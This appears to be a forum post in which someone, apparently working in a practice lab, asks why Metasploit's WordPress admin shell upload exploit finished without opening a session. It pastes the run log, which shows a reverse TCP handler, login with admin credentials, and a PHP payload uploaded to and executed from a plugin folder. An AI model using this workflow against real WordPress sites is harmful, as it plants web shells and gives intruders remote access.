After I set all my options, which i've tripple checked i get the following
msf5 exploit(unix/webapp/wp_admin_shell_upload) > run
 Started reverse TCP handler on 10.10.14.18:4444
 Authenticating with WordPress using admin:[email protected]!...
[+] Authenticated with WordPress
 Preparing payload...
 Uploading payload...
 Executing the payload at /wordpress/wp-content/plugins/isEHXJHygE/CXffIyrlNi.php...
[!] This exploit may require manual cleanup of 'CXffIyrlNi.php' on the target
[!] This exploit may require manual cleanup of 'isEHXJHygE.php' on the target
[!] This exploit may require manual cleanup of '../isEHXJHygE' on the target
 Exploit completed, but no session was created.
am I doing something wrong? Please help